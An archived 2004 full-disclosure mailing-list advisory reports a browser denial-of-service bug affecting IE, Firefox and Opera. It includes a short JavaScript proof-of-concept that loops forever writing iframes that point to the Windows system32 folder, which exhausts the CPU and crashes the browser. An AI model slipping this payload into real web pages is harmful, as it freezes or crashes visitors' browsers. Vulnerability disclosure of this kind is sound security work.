[<prev] [next>] [day] [month] [year] [list]
Message-ID: <006f01c4871e$73cd9cc0$6501a8c0@box1>
From: exploits at su1d.net (exploits)
Subject: IE, Firefox, Opera DoS
Description
========
Browser DoS through viewing of a malicious page that repeatedly loads iframes of C:\Windows\System32 using 100% cpu
Crashes Mozilla Firefox, Latest Opera and IE - Opera gives the error "The address type is unknown or unsupported" and crashes
POC
===
<scr1pt language="JavaScript">
while(true)
{
document.write("<iframe src=\"C:\Windows\system32\"></iframe>");
}
</scr1pt>Discovered by MeFakon part of the su1d exploit development teamDISCLAIMER:
This advisory is meant only for the dissemination of information, alerting the
general public about a security issue. Use this information at your own
discretion.
In brief, the author is not responsible for any use, misuse, abuse of this
information. Also, this information is provided "as is" without any warranty of
any kind.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040820/2ac36292/attachment.html
Powered by blists - more mailing lists